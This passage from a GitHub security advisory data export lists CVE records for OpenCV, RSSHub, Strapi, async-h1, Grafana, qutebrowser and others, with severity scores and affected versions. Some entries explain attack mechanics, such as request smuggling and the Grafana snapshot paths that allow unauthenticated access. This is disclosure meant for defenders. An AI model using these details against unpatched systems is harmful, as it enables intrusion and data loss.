4.1.1.26). There is an out of bounds read in the function cv::predictOrdered in modules/objdetect/src/cascadedetect.hpp, which leads to denial of service.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7.28'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.4.6.27'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0.21'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7.28'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.4.6.27'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0.21'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7.28'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.4.6.27'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0.21'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7.28'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.4.6.27'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0.21'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14491'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/15125'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/compare/33b765d...4a7ca5a'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/compare/371bba8...ddbd10c'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HPFLN6QAX6SUA4XR4NMKKXX26H3TYCVQ/'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T15:12:30Z', 'nvd_published_at': '2019-08-01T17:15:00Z'}" +1.4.0,GHSA-pgjj-866w-fc5c,2021-10-11T16:14:26Z,2021-10-12T16:03:43Z,,['CVE-2021-21278'],Risk of code injection,"### Impact +Some routes use `eval` or `Function constructor`, which may be injected by the target site with unsafe code, causing server-side security issues + +### Patches +Temporarily removed the problematic route and added a `no-new-func` rule to eslint +Self-built users should upgrade to 7f1c430 and later as soon as possible + +### Credits +Tencent Woodpecker Security Team + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [https://github.com/DIYgod/RSSHub/issues](https://github.com/DIYgod/RSSHub/issues) +* Email us at [i@diygod.me](mailto:i@diygod.me)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'rsshub'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/DIYgod/RSSHub/security/advisories/GHSA-pgjj-866w-fc5c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21278'}, {'type': 'WEB', 'url': 'https://github.com/DIYgod/RSSHub/commit/7f1c43094e8a82e4d8f036ff7d42568fed00699d'}, {'type': 'PACKAGE', 'url': 'https://github.com/DIYgod/RSSHub'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/rsshub'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-11T16:14:26Z', 'nvd_published_at': '2021-01-26T21:15:00Z'}" +1.4.0,GHSA-3pcq-34w5-p4g2,2022-08-15T20:14:42Z,2021-10-21T17:49:30Z,,['CVE-2021-41167'],modern-async's `forEachSeries` and `forEachLimit` functions do not limit the number of requests,"### Impact + +This is a bug affecting two of the functions in this library: `forEachSeries` and `forEachLimit`. They should limit the concurrency of some actions but, in practice, they don't. Any code calling these functions will be written thinking they would limit the concurrency but they won't. This could lead to potential security issues in other projects. + +### Patches + +The problem has been patched in 1.0.4. + +### Workarounds + +There is no workaround aside from upgrading to 1.0.4. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'modern-async'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nicolas-van/modern-async/security/advisories/GHSA-3pcq-34w5-p4g2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41167'}, {'type': 'WEB', 'url': 'https://github.com/nicolas-van/modern-async/issues/5'}, {'type': 'WEB', 'url': 'https://github.com/nicolas-van/modern-async/commit/0010d28de1b15d51db3976080e26357fa7144436'}, {'type': 'PACKAGE', 'url': 'https://github.com/nicolas-van/modern-async'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-20T17:39:03Z', 'nvd_published_at': '2021-10-20T19:15:00Z'}" +1.4.0,GHSA-37hx-4mcq-wc3h,2021-10-06T14:09:30Z,2021-10-06T17:48:16Z,,['CVE-2021-28128'],Weak Password Recovery Mechanism for Forgotten Password in Strapi,"In Strapi through 3.6.0, the admin panel allows the changing of one's own password without entering the current password. An attacker who gains access to a valid session can use this to take over an account by changing the password.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'strapi'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28128'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/issues/9657'}, {'type': 'PACKAGE', 'url': 'https://github.com/strapi/strapi'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/releases/tag/v3.6.0'}, {'type': 'WEB', 'url': 'https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-008.txt'}]","{'cwe_ids': ['CWE-640'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T14:09:30Z', 'nvd_published_at': '2021-05-06T14:15:00Z'}" +1.4.0,GHSA-4vr9-8cjf-vf9c,2021-10-08T22:14:28Z,2021-10-12T16:00:37Z,,['CVE-2020-26281'],Async-h1 request smuggling possible with long unread bodies,"### Impact +This vulnerability affects any webserver that uses async-h1 behind a reverse proxy, including all such Tide applications. + +If the server does not read the body of a request which is longer than some buffer length, async-h1 will attempt to read a subsequent request from the body content starting at that offset into the body. + +One way to exploit this vulnerability would be for an adversary to craft a request such that the body contains a request that would not be noticed by a reverse proxy, allowing it to forge forwarded/x-forwarded headers. If an application trusted the authenticity of these headers, it could be misled by the smuggled request. + +Another potential concern with this vulnerability is that if a reverse proxy is sending multiple http clients' requests along the same keep-alive connection, it would be possible for the smuggled request to specify a long content and capture another user's request in its body. This content could be captured in a post request to an endpoint that allows the content to be subsequently retrieved by the adversary. + + +### Patches +This has been addressed in async-h1 2.3.0 and previous versions have been yanked. + +### Workarounds +none + +### References +https://github.com/http-rs/async-h1/releases/tag/v2.3.0 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [async-h1](https://github.com/http-rs/async-h1) +* Contact a core team member on [zulip](https://http-rs.zulip-chat.com) or [discord](https://discord.gg/x2gKzst)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'async-h1'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/http-rs/async-h1/security/advisories/GHSA-4vr9-8cjf-vf9c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26281'}, {'type': 'PACKAGE', 'url': 'https://github.com/http-rs/async-h1'}, {'type': 'WEB', 'url': 'https://github.com/http-rs/async-h1/releases/tag/v2.3.0'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0093.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:14:28Z', 'nvd_published_at': '2020-12-21T22:15:00Z'}" +1.4.0,GHSA-69j6-29vr-p3j9,2021-11-18T15:13:27Z,2021-10-05T20:24:02Z,,['CVE-2021-39226'],Authentication bypass for viewing and deletions of snapshots,"Today we are releasing Grafana 7.5.11, and 8.1.6. These patch releases include an important security fix for an issue that affects all Grafana versions from 2.0.1. + +[Grafana Cloud](https://grafana.com/cloud) instances have already been patched and an audit did not find any usage of this attack vector. [Grafana Enterprise](https://grafana.com/products/enterprise) customers were provided with updated binaries under embargo. + +8.1.5 contained a single fix for bar chart panels. We believe that users can expedite deployment by moving from 8.1.4 to 8.1.6 directly. + +## CVE-2021-39226 Snapshot authentication bypass + +### Summary + +CVSS Score: 9.8 Critical +CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + +We received a security report to [security@grafana.com](mailto:security@grafana.com) on 2021-09-15 about a vulnerability in Grafana regarding the snapshot feature. It was later identified as affecting Grafana versions from 2.0.1 to 8.1.6. [CVE-2021-39226](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39226) has been assigned to this vulnerability. + +### Impact +Unauthenticated and authenticated users are able to view the snapshot with the lowest database key by accessing the literal paths: + +* `/dashboard/snapshot/:key`, or +* `/api/snapshots/:key` + +If the snapshot ""public_mode"" configuration setting is set to true (vs default of false), unauthenticated users are able to delete the snapshot with the lowest database key by accessing the literal path: + +* `/api/snapshots-delete/:deleteKey` + +Regardless of the snapshot ""public_mode"" setting, authenticated users are able to delete the snapshot with the lowest database key by accessing the literal paths: + +* `/api/snapshots/:key`, or +* `/api/snapshots-delete/:deleteKey` + +The combination of deletion and viewing enables a complete walk through all snapshot data while resulting in complete snapshot data loss. + +### Attack audit + +While we can not guarantee that the below will identify all attacks, if you do find something with the below, you should consider doing a full assessment. + +#### Through reverse proxy/load balancer logs + +To determine if your Grafana installation has been exploited for this vulnerability, search through your reverse proxy/load balancer access logs for instances where the path is `/dashboard/snapshot/:key`, `/api/snapshots/:key` or `/api/snapshots-delete/:deleteKey`, and the response status code was 200 (OK). +For example, if you’re using the Kubernetes ingress-nginx controller and sending logs to Loki, use a LogQL query like `{job=""nginx-ingress-controller""} |= ""\""status\"": 200"" |= ""\""uri\"": \""/api/snapshots/:key\""""`. + +#### Through the Grafana Enterprise audit feature + +If you enabled “Log web requests” in your configuration with `router_logging = true`, look for +`""requestUri"":""/api/snapshots-delete/”`,`“requestUri"":""/api/snapshots/:key""`, or `""type"":""snapshot""` in combination with `""action"":""delete""`. + +### Patched versions + +Release 8.1.6: + +- [Download Grafana 8.1.6](https://grafana.com/grafana/download/8.1.6) +- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-6/) + +Release 7.5.11: + +- [Download Grafana 7.5.11](https://grafana.com/grafana/download/7.5.11) +- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-5-11/) + +### Solutions and mitigations + +Download and install the appropriate patch for your version of Grafana. + +[Grafana Cloud](https://grafana.com/cloud) instances have already been patched, and [Grafana Enterprise](https://grafana.com/products/enterprise) customers were provided with updated binaries under embargo. + +### Workaround + +If for some reason you cannot upgrade: + +You can use a reverse proxy or similar to block access to the literal paths +* `/api/snapshots/:key` +* `/api/snapshots-delete/:deleteKey` +* `/dashboard/snapshot/:key` +* `/api/snapshots/:key` + +They have no normal function and can be disabled without side effects. + +### Timeline and postmortem + +Here is a detailed timeline starting from when we originally learned of the issue. All times in UTC. + +* 2021-09-15 14:49: Tuan Tran theblackturtle0901@gmail.com sends initial report about viewing snapshots without authentication +* 2021-09-15 15:56: Initial reproduction +* 2021-09-15 17:10: MEDIUM severity declared +* 2021-09-15 18:58: Workaround deployed on Grafana Cloud +* 2021-09-15 19:15: `/api/snapshots/:key` found to be vulnerable as well +* 2021-09-15 19:30: `/api/snapshots/:key` blocked on Grafana Cloud +* 2021-09-16 09:31: `/api/snapshots-delete/:deleteKey` found to be vulnerable as well, blocked on Grafana Cloud. From this point forward, Cloud is not affected any more. +* 2021-09-16 09:35: HIGH severity declared +* 2021-09-16 11:19: Realization that combination of deletion and viewing allows enumeration and permanent DoS +* 2021-09-16 11:19: CRITICAL declared +* 2021-09-17 10:53: Determination that no weekend work is needed. While issue is CRITICAL, scope is very limited +* 2021-09-17 14:26: Audit of Grafana Cloud concluded, no evidence of exploitation +* 2021-09-23: Grafana Cloud instances updated +* 2021-09-28 12:00: Grafana Enterprise images released to customers under embargo +* 2021-10-05 17:00: Public release + +## Reporting security issues + +If you think you have found a security vulnerability, please send a report to [security@grafana.com](mailto:security@grafana.com). This address can be used for all of +Grafana Labs's open source and commercial products (including but not limited to Grafana, Tempo, Loki, Amixr, k6, Tanka, and Grafana Cloud, Grafana Enterprise, and grafana.com). We only accept vulnerability reports at this address. We would prefer that you encrypt your message to us using our PGP key. The key fingerprint is: + +F988 7BEA 027A 049F AE8E 5CAA D125 8932 BE24 C5CA + +The key is available from [keys.gnupg.net](http://keys.gnupg.net/pks/lookup?op=get&fingerprint=on&search=0xD1258932BE24C5CA) by searching for [security@grafana](http://keys.gnupg.net/pks/lookup?search=security@grafana&fingerprint=on&op=index. + +## Security announcements + +We maintain a category on the community site named [Security Announcements](https://community.grafana.com/c/security-announcements), +where we will post a summary, remediation, and mitigation details for any patch containing security fixes. You can also subscribe to email updates to this category if you have a grafana.com account and sign in to the community site, or via updates from our [Security Announcements RSS feed](https://community.grafana.com/c/security-announcements.rss). + +## Acknowledgement + +We would like to thank [Tran Viet Tuan](https://github.com/theblackturtle) for responsibly disclosing the initially discovered vulnerability to us.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.5.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.1.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/grafana/grafana/security/advisories/GHSA-69j6-29vr-p3j9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39226'}, {'type': 'WEB', 'url': 'https://github.com/grafana/grafana/commit/2d456a6375855364d098ede379438bf7f0667269'}, {'type': 'PACKAGE', 'url': 'https://github.com/grafana/grafana'}, {'type': 'WEB', 'url': 'https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-5-11/'}, {'type': 'WEB', 'url': 'https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-6/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCKBFUSY6V4VU5AQUYWKISREZX5NLQJT/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E6ANHRDBXQT6TURLP2THM26ZPDINFBEG/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211029-0008/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/10/05/4'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T18:49:35Z', 'nvd_published_at': '2021-10-05T18:15:00Z'}" +1.4.0,GHSA-mx3x-ghqm-r43h,2021-10-08T22:13:34Z,2021-10-12T16:27:18Z,,['CVE-2020-28280'],Prototype pollution vulnerability in 'predefine',Prototype pollution vulnerability in 'predefine' versions 0.0.0 through 0.1.2 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'predefine'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28280'}, {'type': 'WEB', 'url': 'https://github.com/bigpipe/predefine/commit/1a86a013c0b37c9d6ca078ba34017052af38b7fc'}, {'type': 'PACKAGE', 'url': 'https://github.com/bigpipe/predefine'}, {'type': 'WEB', 'url': 'https://github.com/bigpipe/predefine/blob/238137e3d1b8288ff5d7529c3cbcdd371888c26b/index.js#L284'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28280'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:13:34Z', 'nvd_published_at': '2020-12-29T18:15:00Z'}" +1.4.0,GHSA-xpv2-8ppj-79hh,2021-10-08T21:30:48Z,2021-10-04T20:14:31Z,,['CVE-2021-41862'],Expression injection in AviatorScript,AviatorScript through 5.2.7 allows code execution via an expression that is encoded with Byte Code Engineering Library (BCEL).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.googlecode.aviator:aviator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.2.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41862'}, {'type': 'WEB', 'url': 'https://github.com/killme2008/aviatorscript/issues/421'}, {'type': 'PACKAGE', 'url': 'https://github.com/killme2008/aviatorscript'}]","{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-04T16:58:38Z', 'nvd_published_at': '2021-10-02T00:15:00Z'}" +1.4.0,GHSA-6v6p-p97v-g2p7,2021-11-18T15:32:35Z,2021-10-12T22:01:44Z,,['CVE-2017-12603'],Out-of-bounds Write in OpenCV,"OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python and OpenCV-Contrib-Python 3.3.0.9) has an invalid write in the cv::RLByteStream::getBytes function in modules/imgcodecs/src/bitstrm.cpp when reading an image file by using cv::imread, as demonstrated by the 2-opencv-heapoverflow-fseek test case.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12603'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9309'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T21:00:22Z', 'nvd_published_at': '2017-08-07T01:29:00Z'}" +1.4.0,GHSA-pfwg-rxf4-97c3,2022-06-01T22:01:45Z,2021-10-06T17:47:53Z,,['CVE-2021-28125'],Open Redirect in Apache Superset,Apache Superset prior to 1.1.0 allowed for the creation of an external URL that could be malicious. By not checking user input for open redirects the URL shortener functionality would allow for a malicious user to create a short URL for a dashboard that could convince the user to click the link.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'superset'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.34.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28125'}, {'type': 'WEB', 'url': 'https://github.com/apache/superset/commit/eb35b804acf4d84cb70d02743e04b8afebbee029'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-pfwg-rxf4-97c3'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/superset'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/apache-superset/PYSEC-2021-128.yaml'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r89b5d0dd35c1adc9624b48d6247729c73b2641b32754226661368434%40%3Cdev.superset.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r89b5d0dd35c1adc9624b48d6247729c73b2641b32754226661368434@%3Cdev.superset.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/04/27/2'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T14:11:38Z', 'nvd_published_at': '2021-04-27T10:15:00Z'}" +1.4.0,GHSA-5fvx-5p2r-4mvp,2021-10-25T20:08:26Z,2021-10-21T17:48:41Z,,['CVE-2021-3851'],Open Redirect in firefly-iii,firefly-iii is vulnerable to URL Redirection to Untrusted Site ,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3851'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/8662dfa4c0f71efef61c31dc015c6f723db8318d'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii/'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/549a1040-9b5e-420b-9b80-20700dd9d592'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-20T16:06:15Z', 'nvd_published_at': '2021-10-19T13:15:00Z'}" +1.4.0,GHSA-84g3-cv89-m9gm,2021-10-06T22:34:42Z,2021-10-13T15:33:20Z,,['CVE-2021-25916'],Prototype pollution vulnerability in 'patchmerge',Prototype pollution vulnerability in 'patchmerge' versions 1.0.0 through 1.0.1 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'patchmerge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25916'}, {'type': 'WEB', 'url': 'https://github.com/pjshumphreys/patchmerge/commit/5b383c537eae7a00ebd26d3f7211dac99ddecb12'}, {'type': 'PACKAGE', 'url': 'https://github.com/pjshumphreys/patchmerge'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25916'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T22:34:42Z', 'nvd_published_at': '2021-03-16T16:15:00Z'}" +1.4.0,GHSA-c7gp-2pch-qh2v,2021-11-18T15:33:02Z,2021-10-12T22:01:55Z,,['CVE-2017-12604'],Out-of-bounds Write in OpenCV,OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python and OpenCV-Contrib-Python 3.3.0.9) has an out-of-bounds write error in the FillUniColor function in utils.cpp when reading an image file by using cv::imread.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12604'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9309'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:57:19Z', 'nvd_published_at': '2017-08-07T01:29:00Z'}" +1.4.0,GHSA-xv8x-pr4h-73jv,2021-10-18T16:33:54Z,2021-10-12T15:59:29Z,,['CVE-2021-41121'],Memory corruption when returning a literal struct with a private call inside of it,"### Impact + +When performing a function call inside a literal struct, there is a memory corruption issue that occurs because of an incorrect pointer to the the top of the stack. + +### Patches +0.3.0 / #2447 + +*","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'vyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/security/advisories/GHSA-xv8x-pr4h-73jv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41121'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/pull/2447'}, {'type': 'PACKAGE', 'url': 'https://github.com/vyperlang/vyper'}]","{'cwe_ids': ['CWE-119'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T17:47:24Z', 'nvd_published_at': '2021-10-06T18:15:00Z'}" +1.4.0,GHSA-vw27-fwjf-5qxm,2021-10-21T20:46:42Z,2021-10-22T16:20:10Z,,['CVE-2021-41146'],Arbitrary command execution on Windows via qutebrowserurl: URL handler,"### Impact +Starting with qutebrowser v1.7.0, the Windows installer for qutebrowser registers it as a handler for certain URL schemes. With some applications such as Outlook Desktop, opening a specially crafted URL can lead to argument injection, allowing execution of qutebrowser commands, which in turn allows arbitrary code execution via commands such as `:spawn` or `:debug-pyeval`. + +Only Windows installs where qutebrowser is registered as URL handler are affected. It does *not* have to be set as default browser for the exploit to work. + 